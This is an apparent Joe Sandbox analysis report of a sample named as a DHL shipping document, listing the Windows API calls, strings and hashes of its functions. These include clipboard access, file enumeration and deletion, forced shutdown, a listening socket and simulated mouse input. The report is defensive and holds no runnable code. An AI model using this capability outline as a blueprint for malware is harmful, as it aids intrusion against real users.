GetProcessHeap.KERNEL32(00000000,00000000), ref: 00200D45
HeapFree.KERNEL32(00000000), ref: 00200D4C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00200D55
HeapFree.KERNEL32(00000000), ref: 00200D5C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00200D65
HeapFree.KERNEL32(00000000), ref: 00200D6C
GetProcessHeap.KERNEL32(00000000,?), ref: 00200D78
HeapFree.KERNEL32(00000000), ref: 00200D7F

Part of subcall function 00201193: GetProcessHeap.KERNEL32(00000008,00200BB1,?,00000000,?,00200BB1,?), ref: 002011A1
Part of subcall function 00201193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00200BB1,?), ref: 002011A8
Part of subcall function 00201193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00200BB1,?), ref: 002011B7

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: c96197ae0973bcfdd798a6a2b260e6eda35917ed85d1fc99cdebdf70fda45015
Instruction ID: 31007e7d8c00b0935f44ad4fa32221585e985e2de2b05f3d32609d47e5ad9a22
Opcode Fuzzy Hash: c96197ae0973bcfdd798a6a2b260e6eda35917ed85d1fc99cdebdf70fda45015
Instruction Fuzzy Hash: 63716A7691020AABEF10DFA4EC88FAEBBB8FF04310F144525E914B7192D771AA15CB70

Function 0021EAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(0023CC08), ref: 0021EB29
IsClipboardFormatAvailable.USER32(0000000D), ref: 0021EB37
GetClipboardData.USER32(0000000D), ref: 0021EB43
CloseClipboard.USER32 ref: 0021EB4F
GlobalLock.KERNEL32(00000000), ref: 0021EB87
CloseClipboard.USER32 ref: 0021EB91
GlobalUnlock.KERNEL32(00000000), ref: 0021EBBC
IsClipboardFormatAvailable.USER32(00000001), ref: 0021EBC9
GetClipboardData.USER32(00000001), ref: 0021EBD1
GlobalLock.KERNEL32(00000000), ref: 0021EBE2
GlobalUnlock.KERNEL32(00000000), ref: 0021EC22
IsClipboardFormatAvailable.USER32(0000000F), ref: 0021EC38
GetClipboardData.USER32(0000000F), ref: 0021EC44
GlobalLock.KERNEL32(00000000), ref: 0021EC55
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0021EC77
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0021EC94
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0021ECD2
GlobalUnlock.KERNEL32(00000000), ref: 0021ECF3
CountClipboardFormats.USER32 ref: 0021ED14
CloseClipboard.USER32 ref: 0021ED59

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: 644b447b6dcd8fced4f0098bc2424924ec26d6fa59a76d3d2b03c0573d4cc652
Instruction ID: eb48798bc86edb102aec9992e6aa7b0122c56b41cdd29a842c6730e252a18080
Opcode Fuzzy Hash: 644b447b6dcd8fced4f0098bc2424924ec26d6fa59a76d3d2b03c0573d4cc652
Instruction Fuzzy Hash: FB61E2752042029FD700EF20EC89FAA77E8BFA5714F19451DF856972A1CB70DD85CBA2

Function 0021698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 002169BE
FindClose.KERNEL32(00000000), ref: 00216A12
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00216A4E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00216A75

Part of subcall function 001A9CB3: _wcslen.LIBCMT ref: 001A9CBD

FileTimeToSystemTime.KERNEL32(?,?), ref: 00216AB2
FileTimeToSystemTime.KERNEL32(?,?), ref: 00216ADF

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 00216B6A
%03d, xrefs: 00216DA2
%4d, xrefs: 00216BB1
%4d%02d%02d%02d%02d%02d%03d, xrefs: 00216B32
%02d, xrefs: 00216C00, 00216C0A, 00216C5A, 00216CAA, 00216CFA, 00216D4A

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
API String ID: 3830820486-3289030164
Opcode ID: 1ee0219ca2546aa30bfe36f18655a5a38e139ee98b3114f2278b26fa581f7586
Instruction ID: 48ce0f1084791d474fe12e25f0479c731c9cf9ce840b5fceaf06a3e7df952b8a
Opcode Fuzzy Hash: 1ee0219ca2546aa30bfe36f18655a5a38e139ee98b3114f2278b26fa581f7586
Instruction Fuzzy Hash: 45D17DB6508300AEC310EFA4CD95EAFB7ECAFA9704F04491DF585D6191EB74DA44CBA2

Function 00219642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 00219663
GetFileAttributesW.KERNEL32(?), ref: 002196A1
SetFileAttributesW.KERNEL32(?,?), ref: 002196BB
FindNextFileW.KERNEL32(00000000,?), ref: 002196D3
FindClose.KERNEL32(00000000), ref: 002196DE
FindFirstFileW.KERNEL32(*.*,?), ref: 002196FA
SetCurrentDirectoryW.KERNEL32(?), ref: 0021974A
SetCurrentDirectoryW.KERNEL32(00266B7C), ref: 00219768
FindNextFileW.KERNEL32(00000000,00000010), ref: 00219772
FindClose.KERNEL32(00000000), ref: 0021977F
FindClose.KERNEL32(00000000), ref: 0021978F

Strings

*.*, xrefs: 002196F5

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: 571583c7eb56509ed8c7d75dc5236f18c3483552ab4cd94b8de97f5eda9e2a22
Instruction ID: 7eb4fa3bb4eaeac318fec79bfa87fdb18502f8292ea8ba44f5b6e4a4549a6e2f
Opcode Fuzzy Hash: 571583c7eb56509ed8c7d75dc5236f18c3483552ab4cd94b8de97f5eda9e2a22
Instruction Fuzzy Hash: 2331A27255021AAADB14AFB4EC5DADE77EC9F19320F204166F815E20D0DB30D9D58B64

Function 0021979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 002197BE
FindNextFileW.KERNEL32(00000000,?), ref: 00219819
FindClose.KERNEL32(00000000), ref: 00219824
FindFirstFileW.KERNEL32(*.*,?), ref: 00219840
SetCurrentDirectoryW.KERNEL32(?), ref: 00219890
SetCurrentDirectoryW.KERNEL32(00266B7C), ref: 002198AE
FindNextFileW.KERNEL32(00000000,00000010), ref: 002198B8
FindClose.KERNEL32(00000000), ref: 002198C5
FindClose.KERNEL32(00000000), ref: 002198D5

Part of subcall function 0020DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0020DB00

Strings

*.*, xrefs: 0021983B

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: 878741df419c1727c74e7e0cedbf891a71052a8258543ff7ee552bce01ce76f5
Instruction ID: b43f44e26597519ab78bb207a328c1cb129778ec22742145f0b0c43d7027809c
Opcode Fuzzy Hash: 878741df419c1727c74e7e0cedbf891a71052a8258543ff7ee552bce01ce76f5
Instruction Fuzzy Hash: CC31D23251121AAEDB20EFB4EC58ADE77ECAF16324F214165E814B20D1DB31DEE5CB20

Function 00218195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00218257
SystemTimeToFileTime.KERNEL32(?,?), ref: 00218267
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00218273
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00218310
SetCurrentDirectoryW.KERNEL32(?), ref: 00218324
SetCurrentDirectoryW.KERNEL32(?), ref: 00218356
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0021838C
SetCurrentDirectoryW.KERNEL32(?), ref: 00218395

Strings

*.*, xrefs: 0021839B

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: 40c1ccc08d410c72b6d4b0a8f3122f45a2ee88bff21027ce6748e0f6d4053942
Instruction ID: 36865435f1d1a340592952fdb0c6187d55fffa0b852eca5885527f34a9a3113a
Opcode Fuzzy Hash: 40c1ccc08d410c72b6d4b0a8f3122f45a2ee88bff21027ce6748e0f6d4053942
Instruction Fuzzy Hash: CC61BB725183459FCB10EF20D8849AFB3E8FFA9310F04486DF89983251DB31E995CB92

Function 0020D076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON

Download Yara Rule

APIs

Part of subcall function 001A3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001A3A97,?,?,001A2E7F,?,?,?,00000000), ref: 001A3AC2

Part of subcall function 0020E199: GetFileAttributesW.KERNEL32(?,0020CF95), ref: 0020E19A

FindFirstFileW.KERNEL32(?,?), ref: 0020D122
DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0020D1DD
MoveFileW.KERNEL32(?,?), ref: 0020D1F0
DeleteFileW.KERNEL32(?,?,?,?), ref: 0020D20D
FindNextFileW.KERNEL32(00000000,00000010), ref: 0020D237

Part of subcall function 0020D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0020D21C,?,?), ref: 0020D2B2

FindClose.KERNEL32(00000000,?,?,?), ref: 0020D253
FindClose.KERNEL32(00000000), ref: 0020D264

Strings

\*.*, xrefs: 0020D0CD, 0020D0D6, 0020D0EB

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 1946585618-1173974218
Opcode ID: 24be39ce0c4f1a1710faffc32a793066410ed9fb7705d3eb338c6c4e0a8d5c89
Instruction ID: 1e6561e0b9a33306864f723b66b38beb4a973c1b3335d195c601d235710218dc
Opcode Fuzzy Hash: 24be39ce0c4f1a1710faffc32a793066410ed9fb7705d3eb338c6c4e0a8d5c89
Instruction Fuzzy Hash: 55617D3580221DAFCF05EFE0DA929EEB775AF25300F208165E80677192EB306F59CB60

Function 0021ED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0021ED91
EmptyClipboard.USER32 ref: 0021ED97
GlobalAlloc.KERNEL32(00000002,?), ref: 0021EDAC
CloseClipboard.USER32 ref: 0021EEA3

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: c2c74f7d6eaeae1d04cca2923b4d3c591225285c4e88ffdb0c93bbb210e25546
Instruction ID: e2bdeccfe5b5f14ae0a5f99bd71454da9f20b98801ef0ddde6e27406a025430f
Opcode Fuzzy Hash: c2c74f7d6eaeae1d04cca2923b4d3c591225285c4e88ffdb0c93bbb210e25546
Instruction Fuzzy Hash: 0641EF35214612AFE710CF25E88DF5ABBE4FF54328F15C099E8198B662C771EC81CB90

Function 0020E8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 002016C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0020170D
Part of subcall function 002016C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0020173A
Part of subcall function 002016C3: GetLastError.KERNEL32 ref: 0020174A

ExitWindowsEx.USER32(?,00000000), ref: 0020E932

Strings

, xrefs: 0020E95C
, xrefs: 0020E920
SeShutdownPrivilege, xrefs: 0020E902
@, xrefs: 0020E925

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: d501260110d556afc3daa0639d779df3949beed2befd27f19bea7f93a4827391
Instruction ID: 229053e9b9d6a9bed471dfe98b003fdd6f8b7f0890b856fdeb46011f7e902b82
Opcode Fuzzy Hash: d501260110d556afc3daa0639d779df3949beed2befd27f19bea7f93a4827391
Instruction Fuzzy Hash: E001D67363031AABEF5426B4AC8ABBB726CA714750F264D21FC02F21D3D5A15CA08690

Function 00221204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00221276
WSAGetLastError.WSOCK32 ref: 00221283
bind.WSOCK32(00000000,?,00000010), ref: 002212BA
WSAGetLastError.WSOCK32 ref: 002212C5
closesocket.WSOCK32(00000000), ref: 002212F4
listen.WSOCK32(00000000,00000005), ref: 00221303
WSAGetLastError.WSOCK32 ref: 0022130D
closesocket.WSOCK32(00000000), ref: 0022133C

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: ErrorLast$closesocket$bindlistensocket
String ID:
API String ID: 540024437-0
Opcode ID: 1af0669879d2fb4e8f5906e833a2a5a4c418eebd9ce6c3dbc1ec8e605a1908a3
Instruction ID: 2d1ffa3d36cf9a585045275e5d61e3c2b34423045477bddf9ec4eef868a47dfc
Opcode Fuzzy Hash: 1af0669879d2fb4e8f5906e833a2a5a4c418eebd9ce6c3dbc1ec8e605a1908a3
Instruction Fuzzy Hash: 1741B435A10121EFD710DF64E488F29BBE6AF56314F288188E8569F2D6C771ED91CBE0

Function 001DB952 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 001DB9D4
_free.LIBCMT ref: 001DB9F8
_free.LIBCMT ref: 001DBB7F
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00243700), ref: 001DBB91
WideCharToMultiByte.KERNEL32(00000000,00000000,0027121C,000000FF,00000000,0000003F,00000000,?,?), ref: 001DBC09
WideCharToMultiByte.KERNEL32(00000000,00000000,00271270,000000FF,?,0000003F,00000000,?), ref: 001DBC36
_free.LIBCMT ref: 001DBD4B

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: 7be5a0f154f069d2abcbc41b055acb149bc1b19c4b92d73177fc2d64a9f38c7f
Instruction ID: 79a5ac3b21b9c316003b7af4e62cdf68aef298d47ea4f2fd46e9e7f3f53a0c5b
Opcode Fuzzy Hash: 7be5a0f154f069d2abcbc41b055acb149bc1b19c4b92d73177fc2d64a9f38c7f
Instruction Fuzzy Hash: A7C13571A08244EFCB249F789C91BAA7BB8EF51310F16419BE896D7352EB309E41D750

Function 0020D3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 001A3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001A3A97,?,?,001A2E7F,?,?,?,00000000), ref: 001A3AC2

Part of subcall function 0020E199: GetFileAttributesW.KERNEL32(?,0020CF95), ref: 0020E19A

FindFirstFileW.KERNEL32(?,?), ref: 0020D420
DeleteFileW.KERNEL32(?,?,?,?), ref: 0020D470
FindNextFileW.KERNEL32(00000000,00000010), ref: 0020D481
FindClose.KERNEL32(00000000), ref: 0020D498
FindClose.KERNEL32(00000000), ref: 0020D4A1

Strings

\*.*, xrefs: 0020D3F2

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: b016b36a84444b540a3577cf41081f0c4161a1b5a9b19dc91f7aa0c08a95960f
Instruction ID: 5e752a81ae7ee52c83f027d53c1c1eb3d90240b2a939d059a41eaa379dfa3924
Opcode Fuzzy Hash: b016b36a84444b540a3577cf41081f0c4161a1b5a9b19dc91f7aa0c08a95960f
Instruction Fuzzy Hash: 9131A0350193459FC301EF64D8959AFB7A8BEA2314F844A1DF4D193192EB30AA19CB63

Function 001DE4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 001DE645

Strings

1#INF, xrefs: 001DF852
1#QNAN, xrefs: 001DF84B
1#IND, xrefs: 001DF83D
1#SNAN, xrefs: 001DF844

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: eb016193f85f1b72ff8aea2487a4cb721fb916f833cc8509648c1c3a4ddde0d3
Instruction ID: 83fe8b77cad68d8bb3de4ddd40fb0687622b005d21e49b22b5275b49c7cafe12
Opcode Fuzzy Hash: eb016193f85f1b72ff8aea2487a4cb721fb916f833cc8509648c1c3a4ddde0d3
Instruction Fuzzy Hash: A9C22971E046288FDB29DF289D407EAB7B5EB59305F1541EBD84EE7240E774AE828F40

Function 0021648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 002164DC
CoInitialize.OLE32(00000000), ref: 00216639
CoCreateInstance.OLE32(0023FCF8,00000000,00000001,0023FB68,?), ref: 00216650
CoUninitialize.OLE32 ref: 002168D4

Strings

.lnk, xrefs: 002164BA, 00216524, 002165E0

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: dc4a455a1dc35f29c3d980050c78a14db521372e04274d70dd42bc5d17bc5a51
Instruction ID: 5674208093ce6bda179978d144670ceef188c664290687257484c55db606bab3
Opcode Fuzzy Hash: dc4a455a1dc35f29c3d980050c78a14db521372e04274d70dd42bc5d17bc5a51
Instruction Fuzzy Hash: EFD16A71518301AFC304EF24C881EABB7E9FFA9304F50492DF5958B291DB31E949CB92

Function 002222DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,00000000), ref: 002222E8

Part of subcall function 0021E4EC: GetWindowRect.USER32(?,?), ref: 0021E504

GetDesktopWindow.USER32 ref: 00222312
GetWindowRect.USER32(00000000), ref: 00222319
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00222355
GetCursorPos.USER32(?), ref: 00222381
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 002223DF

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForeground
String ID:
API String ID: 2387181109-0
